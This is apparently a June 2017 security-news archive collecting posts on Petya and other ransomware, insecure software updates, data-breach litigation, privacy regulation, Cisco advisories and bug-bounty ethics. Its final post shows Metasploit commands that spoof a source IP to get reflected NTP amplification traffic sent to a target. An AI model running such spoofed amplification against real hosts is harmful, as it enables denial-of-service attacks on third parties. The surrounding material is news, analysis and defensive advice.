Monthly Archives: June 2017

Ransomware Health Data Breach Affects 500,000 Patients

On June 26, 2017, Airway Oxygen, a provider of oxygen therapy and home medical equipment, reported that it was the subject of a ransomware attack affecting 500,000 patients’ protected health information. The attack is the second largest health data breach recorded by the Office for Civil Rights (“OCR”) this year, and the largest ransomware incident recorded by OCR since it began tracking incidents in 2009.

According to Airway Oxygen’s statement, the company discovered the presence of ransomware on its systems in April 2017. The company’s investigation determined that attackers were able to access 500,000 patients’ names, addresses, birth dates, telephone numbers, medical diagnosis and treatments, and health insurance policy numbers. The personal information of approximately 1,160 current and former employees was also compromised. The company has not commented on whether the demanded ransom was paid.

This reported incident follows last month’s WannaCry ransomware attack, which affected tens of thousands computers in over 100 countries. It also comes on the heels of a massive malware attack reported on June 27, which shut down computers all over the world. The malware involved in the June 27 attack mimicked many characteristics of ransomware, but its ultimate objective was to wipe the hard drives of infected networks, without giving victims the opportunity to pay to retrieve their data. Researchers believe that attackers designed the malware to mimic ransomware in order to leverage the widespread media attention garnered by the WannaCry attack.

As the events of the past two months have shown, ransomware is a growing concern. These recent high profile attacks are part of an overall trend in the evolving threat landscape. Businesses and other organizations should take into account the myriad legal considerations in their efforts to prevent, investigate and recover from these disruptive attacks.

Petya Malware Variant (Update C)

This updated alert is a follow-up to the updated alert titled ICS-ALERT-17-181-01B Petya Malware Variant that was published July 5, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of reports of a variant of the Petya malware that is affecting several countries. ICS-CERT is releasing this alert to enhance the awareness of critical infrastructure asset owners/operators about the Petya variant and to identify product vendors that have issued recommendations to mitigate the risk associated with this malware.

The Consequences of Insecure Software Updates

In this blog post, I discuss the impact of insecure software updates as well as several related topics, including mistakes made by software vendors in their update mechanisms, how to verify the security of a software update, and how vendors can implement secure software updating mechanisms.

Earlier in June of this year, I published two different vulnerability notes about applications that update themselves insecurely:

  • VU#846320 - Samsung Magician fails to update itself securely
  • VU#489392 - Acronis True Image fails to update itself securely

In both of these cases, the apparent assumption the software makes is that it is operating on a trusted network and that no attacker would attempt to modify the act of checking for or downloading the updates. This is not a valid assumption to make.

Consider the situation where you think you're on your favorite coffee shop's WiFi network. If you have a single application with an insecure update mechanism, you are at risk to be a victim of what's known as an evilgrade attack. That is, you may inadvertently install code from an attacker during the software update process. Given that software updaters usually run with administrative privileges, the attacker's code will subsequently run with administrative privileges as well. In some cases, this can happen with no user interaction. This risk has been publicly known since 2010.

The dangers of an insecure update process are much more severe than an individual user being compromised while on an untrusted network. As the recent ExPetr/NotPetya/Petya wiper malware has shown, the impact of insecure updates can be catastrophic. Let me expand on this topic by discussing several important aspects of software updates:

  1. What mistakes can software vendors make when designing a software update mechanism?
  2. How can I verify that my software performs software updates securely?
  3. How should vendors implement a secure software update mechanism?

Insecure Software Updates and Petya

Microsoft has reported that the Petya malware originated from the update mechanism for the Ukrainian tax software called MEDoc. Because of my language barrier, I was not able to thoroughly exercise the software. However, with the help of CERT Tapioca, I was able to see the network traffic that was being used for software updates. This software makes two critical mistakes in its update mechanism: (1) it uses the insecure HTTP protocol and (2) the updates are not digitally signed

These are the same two mistakes that the vulnerable Samsung Magician software (VU#846320) and the vulnerable Acronis True Image software (VU#489392) contain. Let's dig in to the two main flaws in software updaters:

Use of an Insecure Transport Layer

HTTP is used in a number of software update mechanisms, as opposed to the more-secure HTTPS protocol. What makes HTTPS more secure? Properly-configured HTTPS communications attempt to achieve three goals:

  1. Confidentiality - Traffic is protected against eavesdropping.
  2. Integrity - Traffic content is protected against modification.
  3. Authenticity - The client verifies the identity of the server being contacted.

Let's compare the differences between an update mechanism that uses a properly configured HTTPS protocol versus one that uses either HTTP or HTTPS but without validating certificates :

ProtocolConfidentialityIntegrityAuthenticity
Properly-configured HTTPS Software update request content is not visible to attackers. Software update requests cannot be modified by an attacker
Software update traffic cannot be redirected by an attacker
HTTP or HTTPS that is not validated An attacker can view the contents of software update requests. An attacker can modify update requests or responses to modify the update behavior or outcome. An attacker can intercept and redirect software update requests to a malicious server.

Based on its inability to address these three goals, it is clear that HTTP is not a viable solution for software update traffic.

Lack of Digital Signatures for Updates

If software updates are not digitally signed, or if the software update mechanism does not validate signatures, the absence of digital signatures can allow an attacker to replace a software update with malware. A simple test that I like to do when testing software updaters is to test if the software will download and install calc.exe from Windows instead of the expected update. If calc.exe pops up when the update occurs, we have evidence of a vulnerable update mechanism!

Verifying Software Updaters

CERT Tapioca can be used to easily observe if an application uses HTTP or non-validated HTTPS traffic for updates. Any update traffic that appears in the Tapioca mitmproxy window is an indication that the update uses an insecure transport layer. As long as the mitmproxy root CA certificate is not installed on the client system, the only traffic that will appear in the mitmproxy window will be HTTP traffic and HTTPS traffic that is not checked for a trusted root CA, both of which are insecure.

Determining whether an application validates the digital signatures of updates requires a little more work. Essentially, you need to intercept the update and redirect it to an update under your control that is either unsigned or signed by another vendor.

A "Belt and Suspenders" Approach to Updates

If an update mechanism uses HTTPS, it should ensure that a software update mechanism is only communicating with a legitimate update server, right? And shouldn't that be enough to ensure a secure update? Well, not exactly.

First, HTTPS is not without flaws. There have been a number of flaws in various protocols and ciphersuites supported by HTTPS, including FREAK, DROWN, BEAST, CRIME, BREACH, and POODLE. These known flaws, which were fixed in HTTPS communications using modern TLS protocols, can weaken the confidentiality, integrity, and authenticity goals that HTTPS aims to provide. It is also important to realize that even without such flaws, HTTPS without pinning can ensure website authenticity only to the level that the PKI and certificate authority architecture allow. See Moxie Marlinspike's post SSL and the Future of Authenticity for more details.

HTTPS flaws and other weaknesses aside, using HTTPS without signature-validated updates leaves a large open hole that can be attacked. What happens if an attacker can compromise an update server? If software update signatures are not validated, a compromise of a single server can result in malicious software being deployed to all clients. There is evidence that this is exactly what happened in the case of MEDoc.

virus_attack.pngSource: archive.org / Google translate

Using HTTPS can help to ensure both the transport layer security as well as the identity of the update server. Validating digital signatures of the updates themselves can help limit the damage even if the update server is compromised. Both of these aspects are vital to the operation of a secure software update mechanism.

Conclusion and Recommendations

Despite evilgrade being a publicly-known attack for about seven years now, it is still a problem. Because of the nature of how software is traditionally installed on Windows and Mac systems, we live in a world where every application may end up implementing its own auto-update mechanism independently. And as we are seeing, software vendors are frequently making mistakes in these updaters. Linux and other operating systems that use package-management systems appear to be less affected by this problem, due to the centralized channel through which software is installed.

Recommendations for Users

So what can end users do to protect themselves? Here are my recommendations:

  • Especially when on untrusted networks, be wary of automatic updates. When possible, retrieve updates using your web browser from the vendor's HTTPS website. Popular applications from major vendors are less likely to contain vulnerable update mechanisms, but any software update mechanism has the possibility of being susceptible to attack.
  • For any application you use that contains an update mechanism, verify that the update is at least not vulnerable to a MITM attack by performing the update using CERT Tapioca as an internet source. Virtual machines make this testing easier.

Recommendations for Developers

What can software developers do to provide software updates that are secure? Here are my recommendations:

  • If your software has an update mechanism, ensure that it both:
    • Uses properly validated HTTPS for a communications channel instead of HTTP
    • Validates digital signatures of retrieved updates before installing them
  • To protect against an update server compromise affecting your users, ensure that the code signing key is not present on the update server itself. To increase protection against malicious updates, ensure the code signing key is offline, or otherwise unavailable to an attacker.

Enterprise Security Weekly #51 – Idempotency

Apollo Clark joins us to discuss managing AWS cloud resources, docker security in the enterprise is our topic for the week, and we discuss the latest enterprise news!Full Show Notes: https://wiki.securityweekly.com/ES_Episode51Visit https://www.securityweekly.com for all the latest episodes!

Cisco Netflow Generation Appliance Software 1.0(2) unresponsive Denial Of Service Vulnerability

A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) with software before 1.1(1a) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition. The vulnerability is due to incomplete validation of SCTP packets being monitored on the NGA data ports. An attacker could exploit this vulnerability by sending malformed SCTP packets on a network that is monitored by an NGA data port. SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI. The following Cisco NetFlow Generation Appliances are vulnerable: NGA 3140, NGA 3240, NGA 3340. Cisco Bug IDs: CSCvc83320.

Information Security 101 with Lisa Sotto: Legal Risks

In the first segment of this three-part series, Lisa Sotto, head of the Global Privacy and Cybersecurity practice at Hunton & Williams, discusses information security law issues with The Electronic Discovery Institute. “[Information security] is a significant risk issue” and should be “at the top of the radar screen” for C-suites and boards of directors, says Sotto. In this segment, Sotto addresses U.S. and global data breach notification laws.

Watch the full video.

Petya Ransomware: What You Need to Know and Do

By: Andrew Hay

Unless you’ve been away from the Internet earlier this week, you’ve no doubt heard by now about the global ransomware outbreak that started in Ukraine and subsequently spread West across Western Europe, North America, and Australia yesterday. With similarities reminiscent to its predecessor WannaCry, this ransomware attack shut down organizations ranging from the Danish shipping conglomerate Maersk Line to a Tasmanian-based Cadbury chocolate factory.

I was asked throughout the course of yesterday and today to help clarify exactly what transpired. The biggest challenge with any surprise malware outbreak is the flurry of hearsay, conjecture, speculation, and just plain guessing by researchers, analysts, and the media.

At a very high level, here is what we know thus far:

  • The spread of this campaign appears to have originated in Ukraine but has migrated west to impact a number of other countries, including the United States where pharmaceutical giant Merck and global law firm DLA Piper were hit
  • The initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MeDoc
  • This appears to be a piece of malware utilizing the EternalBlue exploit disclosed by the Shadow Brokers back in April 2017 when the group released several hacking tools obtained from the NSA
  • Microsoft released a patch in March 2017 to mitigate the discovered remote code execution vulnerabilities that existed in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handled certain requests
  • The malware implements several lateral movement techniques:
    • Stealing credentials or re-using existing active sessions
    • Using file-shares to transfer the malicious file across machines on the same network
    • Using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines
  • Experts continue to debate whether or not this is a known malware variant called Petya but several researchers and firms claim that this is a never before seen variant that they are calling GoldenEye, NotPetya, Petna, or some other random name such as Nyetya
  • The jury is still out on whether or not the malware is new or simply a known variant

 

Who is responsible?

The million dollar question on everyone’s mind is “was this a nation-state backed campaign designed to specifically target Ukraine”? We at LEO believe that to be highly unlikely for a number of reasons. The likelihood that this is an opportunistic ransomware campaign with some initial software package targets is far more likely scenario than a state-sponsored actor looking to destabilize a country.

Always remember the old adage from Dr. Theodore Woodward: When you hear hoofbeats, think of horses not zebras.

If you immediately start looking for Russian, Chinese, or North Korean state-sponsored actors around every corner, you’ll inevitably construct some attribution and analysis bias. Look for the facts, not the speculation.

What does LEO recommend you do?

We recommend customers that have not yet installed security update MS17-010 to do so as soon as possible. Until you can apply the patch, LEO also recommends the following steps to help reduce the attack surface:

  • Disable SMBv1 with the steps documented at Microsoft Knowledge Base Article 2696547
  • Block incoming SMB traffic from the public Internet on port 445 and 139, adding a rule on your border routers, perimeter firewalls, and any intersecting traffic points between a higher security network zone to a lower security network zone
  • Disable remote WMI and file sharing, where possible, in favor of more secure file sharing protocols
  • Ensure that your logging is properly configured for all network-connected systems including workstations, servers, virtualized guests, and network infrastructure such as routers, switches, and firewalls
  • Ensure that your antimalware signatures are up-to-date on all systems (not just the critical ones)
  • Review your patch management program to ensure that emergency patches to mitigate critical vulnerabilities and easily weaponized attacks can be applied in an expedited fashion
  • Finally, consider stockpiling some cryptocurrency, like Bitcoin, to reduce any possible transaction downtime should you find that your organization is forced to pay the ransom. Attempting to acquire Bitcoin during an incident may be time-prohibitive

 

Should your organization need help or clarification on any of the above recommendations, please don’t hesitate to reach out to LEO Cyber Security for immediate assistance.

Further reading

The post Petya Ransomware: What You Need to Know and Do appeared first on LEO Cyber Security.

Follow up to the vuln disclosure post

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.

-Bug Bounty awards are appreciation for the work not a right.

-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat.  Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train.  **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply: https://blog.anantshri.info/response-vulnerability-disclosure-free-bug-reports-greedy-bastard/
---

I got a variety responses from it's the right thing to do... up to if they don't pay up, they don't get the info. Collectively,  I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

https://www.youtube.com/watch?v=H19uKs99vIw&feature=youtu.be&t=1m15s

"The problem is with me"


I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment.  I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)







Hack Naked News #131 – June 28, 2017

DoD networks have been compromised, the Shadow Brokers continue their exploits, a Pennsylvania healthcare system gets hit with Petya, and more. Jason Wood of Paladin Security joins us to discuss nations' offensive technical strengths and defensive weaknesses on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode131Visit https://www.securityweekly.com for all the latest episodes!

Email Provider Disables Ransomware Mailbox – Good or Bad?

Here's a headline that will likely make you cheer.
Or it'll make your heart sink as you realize your files are now gone. Forever

Or maybe it'll get you thinking like it did for me...
Email Provider Shuts Down Petya Inbox Preventing Victims From Recovering Files
I read this line and started thinking ... oh my God ... what are some of the victims going to do?!
"The German email provider's decision is catastrophic news for Petya victims, as they won't be able to email the Petya author in the case they want to pay the ransom to recover sensitive files needed for urgent matters."

While I believe Posteo had good intentions, I believe the net result will be a bad situation made significantly worse. In a ransomware scenario you have three options:

  • Pay up (hope you get your stuff back)
  • Ignore it and restore from back up (and hope your stuff is backed up)
  • Hope like hell someone cracks the encryption/software/attacker in time to get your files back without having to pay (hey, it's happened before)
The problem is if you're a Petya victim option #1 is no longer open to you. There are several scenarios where a victim could have no choice but to pay up, like when backups aren't available (or they haven't planned that far ahead). Now, a few friends on Twitter made a valid argument for what Posteo did - including that they wanted to stop funding an attacker and ultimately had a criminal on their hands they wanted to shut down. All well and good - but think of the impact.

While I don't think it hurts the email provider to continue to keep the mailbox open, closing it down is catastrophic. It's irresponsible. And maybe even a little mean-spirited. Unless you're willing to argue that you've never been a victim, or that you "deserved what you got" (which is a BS argument) this action by Posteo is insane.

On the other side of this coin, there are very good reasons to keep the mailbox open. For example it could provide some insight into the attacker/criminal. Maybe the attacker accidentally accesses the inbox from their home cable modem and investigators can track them down that way. You never know. There's the obvious reason that people should get their files back if they have no other alternative but to pay and we know that is the case in many, many, many cases.

What do you think? I think what Posteo did was rash and maybe a little stupid. Clearly they're not thinking about the victims here - and that's irresponsible.


-- Edit 27-June-17 @ 11:46pm

So this is interesting and helps understand the scope of what's affected and who is impacted. Still think it was a bright idea to kill that mailbox?
https://www.buzzfeed.com/otilliasteadman/heres-just-who-got-hit-by-that-latest-massive-cyberattack

Record Data Breach Settlement in Anthem Class Action

On June 23, 2017, Anthem Inc., the nation’s second largest health insurer, reached a record $115 million settlement in a class action lawsuit arising out of a 2015 data breach that exposed the personal information of more than 78 million people. Among other things, the settlement creates a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers, as well as up to $38 million in attorneys’ fees.

Anthem announced in February 2015 that it had been the target of an external cyber attack. The personal information obtained by attackers included names, dates of birth, Social Security numbers and health care ID numbers. Following the breach, Anthem offered affected individuals two years of credit monitoring. Under the settlement agreement, plaintiffs will be offered an additional two years of credit monitoring and identity protection services. Class members who already have credit monitoring services can submit a claim for monetary compensation instead of receiving the additional services.

The settlement also requires Anthem to make certain changes to its data security systems and cybersecurity practices for at least three years. These changes include (1) implementing data retention periods, (2) strict access requirements, (3) mandatory information security training for all associates and (4) annual IT security risk assessments. During this three year period, Anthem must engage an independent consultant to verify it is in compliance with the terms of the settlement agreement, and remediate 95 percent of critical findings within three years. The settlement further requires Anthem to allocate a certain amount of funds for information security and increase its funding for every additional 5,000 users if Anthem increases its users by more than 10 percent, whether by acquisition or growth.

The U.S. District Court for the Northern District of California, San Jose Division, is scheduled to hear a motion for preliminary approval of the settlement on August 17, 2017. If approved, a third-party administrator will be appointed to manage the settlement.

Tempur Sealy Data Breach: Putative Class Action Filed

On June 12, 2017, a putative class action was filed in the U.S. District Court for the Northern District of Georgia against Tempur Sealy International, Inc. and Aptos, Inc. Tempur Sealy is a mattress, bedding and pillow retailer based in Lexington, Kentucky. Aptos is headquartered in Atlanta, Georgia, and formerly hosted and maintained Tempur Sealy’s website and online payment system. The plaintiff alleges that the breach was discovered in November of 2016 and involved the exposure of payment card data and other PII of an undisclosed number of Tempur Sealy customers.   

The complaint advances claims for violations of 49 jurisdictions’ consumer protection laws, 39 jurisdictions’ breach notification laws, as well as causes of action for negligence, breach of implied contract and unjust enrichment. The plaintiff seeks to certify statewide consumer protection and data breach notification classes for New York residents, as well as a nationwide class (or alternative statewide classes) for the negligence, breach of implied contract and unjust enrichment claims. The plaintiff alleges that the defendants failed to follow best practices and industry security standards, including PCI DSS. The plaintiff also complains about violations of Tempur Sealy’s own posted privacy policy. The complaint additionally requests injunctive relief and various forms of monetary damages.

The named plaintiff alleges at least one payment card charge which, “upon information and belief,” she believes was fraudulent. The allegations do not specifically identify whether the charge was related to the exposed payment card information. However, the plaintiff does allege that the identified charge was not reimbursed. The plaintiff’s other alleged injuries are related to benefit-of-the-bargain/overpayment theories and loss of PII value (both of which are generally unpopular arguments with courts), time spent monitoring accounts, card replacement costs and an increased risk of future harm.

Implementation of the EU GDPR: 30-Minute Guidance Review

As companies in the EU and the U.S. prepare for the application of the EU General Data Protection Regulation (“GDPR”) in May 2018, Hunton & Williams’ Global Privacy and Cybersecurity partner Aaron Simpson discusses with Forcepoint the key, significant changes from the EU Directive that companies must comply with before next year. Accountability, expanded data subject rights, breach notification, sanctions and data transfer mechanisms are a few requirements that Simpson explores in detail. He reminds companies that, in the coming year, it will be very important to “monitor…and stay aware of the guidance being produced by regulators,” but also that the guidance is not a substitute for the specific preparations that each business will need to perform in order to comply with the GDPR.

Listen to the full 30-minute webinar.

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering  companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day".  These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.


Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something?  If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level?  mom and pop maybe not, VC funded startup?  30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomeware'd or their EC2 infra shut down/turned off/deleted codespaces style am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty signifiant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably wont get $$ make me a "bad person"? numbers 1-3 come into play here for sure


My last two jobs, I've worked for companies that had Bug Bounty programs so my opinion on the above is DEFINITELY shaped by working for companies that  get it understand and care about their security posture and do feel that reporting security issues by outside researchers has monetary value. An added benefit to have a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.


Thoughts/comments VERY welcome on this one.  Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route.  I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.


-CG

Startup Security Weekly #45 – Walking In Pajamas

Fred Kneip of CyberGRX joins us. In the news, why most startups fail, conference season tips, the question you need to ask before solving any problem, and updates from GreatHorn, Cybereason, Amazon, and more!Full Show Notes: https://wiki.securityweekly.com/SSWEpisode45Visit https://www.securityweekly.com for all the latest episodes!

Cisco Email Security Appliance 9.7.1-hp2-207 Bypass a restriction or similar Vulnerability

A vulnerability in the content scanning engine of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured message or content filters on the device. Affected Products: This vulnerability affects all releases prior to the first fixed release of Cisco AsyncOS Software for Cisco Email Security Appliances, both virtual and hardware appliances, if the software is configured to apply a message filter or content filter to incoming email attachments. The vulnerability is not limited to any specific rules or actions for a message filter or content filter. More Information: CSCuz16076. Known Affected Releases: 9.7.1-066 9.7.1-HP2-207 9.8.5-085. Known Fixed Releases: 10.0.1-083 10.0.1-087./Excerpt>

UK ICO Revises Subject Access Guidance Following Court Rulings

On June 20, 2017, the UK Information Commissioner’s Office (“ICO”) published an updated version of its Code of Practice on Subject Access Requests (the “Code”). The updates are primarily in response to three Court of Appeal decisions from earlier this year regarding data controllers’ obligations to respond to subject access requests (“SARs”). The revisions more closely align the ICO’s position with the court’s judgments.

Key changes in the Code include:

  • Disproportionate effort: Under the Data Protection Act 1998, there is an exemption from the requirement to respond to a SAR where this would involve ‘disproportionate effort.’ Despite this, the Code previously suggested that there were no circumstances where it would be reasonable to deny access to requested information for the sole reason that responding to the request would be difficult. The updated Code relaxes this position, stating that “there is scope for assessing whether, in the circumstances of a particular case, supplying a copy of the requested information in permanent form would result in so much work or expense as to outweigh the requester’s right of access to their personal data.” The ICO expects, however, that all controllers will evaluate the circumstances of each SAR, balancing any perceived difficulties in complying with the request against the data subject’s benefits in receiving the information.
  • Dialogue with the data subject: The Code now stresses that the ICO considers it a best practice for controllers to enter into dialogue with data subjects following a SAR, allowing the data subject to describe the particular information required and potentially restricting the scope of the SAR. As the Code notes, such a practice has the potential to ensure that the response would not involve disproportionate effort on the controller’s part. It also sets out that where the ICO receives a complaint about a controller’s handling of a SAR, it may take into account the willingness of the controller to engage with the data subject, as well as the data subject’s response.
  • Information management: The Code states that information management systems should be configured so that the controller can easily locate and extract relevant personal data where a SAR has been made, including any archived or back-up data relating to the data subject. It further suggests that systems should allow for the redaction of third-party data where this is deemed necessary.

Although SARs will continue to require, in some cases, considerable efforts from data controllers to provide responsive information, the impact of the Court of Appeal’s decisions has at least tempered the ICO’s previously hardline approach towards a data controller’s obligations in relation to a SAR.

Enterprise Security Weekly #50 – Losing More Hair

Brian Ventura of SANS Institute and Ted Gary of Tenable join us. In the news, five ways to maximize your IT training, pocket-sized printing, 30 years of evasion techniques, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode50Visit https://www.securityweekly.com for all the latest episodes!

FTC Releases Guidance on COPPA Compliance

On June 21, 2017, the Federal Trade Commission updated its guidance, Six-Step Compliance Plan for Your Business, for complying with the Children’s Online Privacy Protection Act (“COPPA”). The FTC enforces the COPPA Rule, which sets requirements regarding children’s privacy and safety online. The updated guidance adds new information on situations where COPPA applies and steps to take for compliance. The changes include:

  • New products and technologies. COPPA applies to the collection of personal information through a “website or online service.” The term is defined broadly, and the updates to the guidance clarify that technologies such as connected toys and other Internet of Things devices can be covered by COPPA.
  • New parental consent methods. Before collecting the personal information of children under the age of 13, COPPA requires that businesses obtain parental consent. The revised guidance addresses two newly-approved methods for obtaining parental consent: (1) answering a series of knowledge-based challenge questions that would be difficult for someone other than the parent to answer; or (2) verifying a picture of a driver’s license or other photo ID submitted by the parent and then comparing that photo to a second photo submitted by the parent, using facial recognition technology.

These updates follow a recent letter from Senator Mark Warner asking the FTC to strengthen efforts to protect children’s personal information in the face of new technologies such as Internet-connected “Smart Toys.”

Germany Issues Ethics Report on Automated and Connected Cars

On June 20, 2017, the German Federal Ministry of Transport and Digital Infrastructure issued a report on the ethics of Automated and Connected Cars (the “Report”). The Report was developed by a multidisciplinary Ethics Commission established in September 2016 for the purpose of developing essential ethical guidelines for the use of automated and connected cars.

The Report acknowledges that self-driving technologies will lead to increased road safety, but also raise a wide range of ethical and privacy concerns that must be addressed. According to its chair, the Ethics Commission “has developed initial guidelines that permit the use of automated transportation systems, but that also take into account the special requirements of safety, human dignity, individual self-determination and data autonomy.”

Key points from the Report’s 20 ethical guidelines are as follows:

  • Automated and connected transportation (driving) is ethically required when these systems cause fewer accidents than human drivers.
  • Damage to property must be allowed before injury to persons: in situations of danger, the protection of human life takes highest priority.
  • In the event of unavoidable accidents, all classification of people based on their personal characteristics (age, gender, physical or mental condition) is prohibited.
  • In all driving situations, it must be clearly defined and recognizable who is responsible for the task of driving—the human or the computer. Who is driving must be documented and recorded (for purposes of potential questions of liability).
  • The driver must fundamentally be able to determine the sharing and use of his driving data (data sovereignty).

The guidelines also provide that business models based on using the data created by automated and connected cars must be circumscribed by the autonomy and data sovereignty of the drivers. The vehicle owners and users make decisions about the sharing and use of the data related to their driving. Data use practices currently prevalent with search engines and social networks should be counteracted early on.

The Report also discusses a wide range of additional questions associated with self-driving and connected cars, including the need to harmonize and balance the principle of data minimization with the demands of traffic safety, as well as competitiveness in the context of global business models for deriving value from data. The Report acknowledges the many interests in such data beyond traffic safety, such as state security interests and the commercial interests of the private sector. In that context, informational self-determination should not be understood solely for the purpose of personal privacy, but also as enabling decisions to share data.

Putative Data Breach Class Action Dismissed for the Third Time

On June 13, 2017, Judge Andrea R. Wood of the Northern District of Illinois dismissed with prejudice a putative consumer class action filed against Barnes & Noble. The case was first filed after Barnes & Noble’s September 2012 announcement that “skimmers” had tampered with PIN pad terminals in 63 of its stores and exposed payment card information. The court had previously dismissed the plaintiffs’ original complaint without prejudice for failure to establish Article III standing. After the Seventh Circuit’s decision in Remijas v. Neiman Marcus Group, the plaintiffs filed an almost identical amended complaint that alleged the same causes of action and virtually identical facts. Although the court found that the first amended complaint sufficiently alleged Article III standing, the plaintiffs nevertheless failed to plead a viable claim. The court therefore dismissed the first amended complaint under Rule 12(b)(6). 

The second amended complaint reduced both the number of plaintiffs and claims, advancing causes of action for breach of implied contract and various claims under Illinois’ and California’s consumer protection statutes. Plaintiffs added factual allegations of injuries stemming from emotional distress, loss of PII value, expended time spent with bank and police employees, used cell phone minutes, inability to use payment cards during the replacement period and the cost of credit monitoring services. The court found, however, that none of the alleged damages, including the cost of the credit monitoring services, were cognizable injuries under Rule 12(b)(6). Finding that further amendment would be futile, given the prior and ample amendment opportunities, the court dismissed the case with prejudice.

UK Government Confirms Implementation of EU GDPR

On June 21, 2017, in the Queen’s Speech to Parliament, the UK government confirmed its intention to press ahead with the implementation of the EU General Data Protection Regulation (“GDPR”) into national law. Among the announcements on both national and international politics, the Queen stated that, “A new law will ensure that the United Kingdom retains its world-class regime protecting personal data, and proposals for a new digital charter will be brought forward to ensure that the United Kingdom is the safest place to be online.” The statement confirms the priority given to data protection issues by the UK government. The UK government specifically confirmed that a new data protection bill will be brought forward to implement the EU GDPR and the EU Directive, which applies to law enforcement data processing. By doing so, the UK government intends to maintain the highest standards of data protection to ensure that data flows with EU Member States and other countries of the world will be maintained after Brexit. The Information Commissioner’s Office’s powers and available sanctions will also be increased.

NTP/SNMP amplification attacks

I needed to verify a SNMP and NTP amplification vulnerability was actually working.

Metasploit  has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[+] 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification


I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address.  I  ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack.  If I didn't spoof the source IP,  the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2
SRCIP => 2.2.2.2
msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[*] Sending 1 packet(s) to 1.1.1.1 from 2.2.2.2

To rule out it wasn't a Metasploit thing I also worked thru the attack with scapy following the examples here:
http://www.nothink.org/misc/snmp_reflected.php

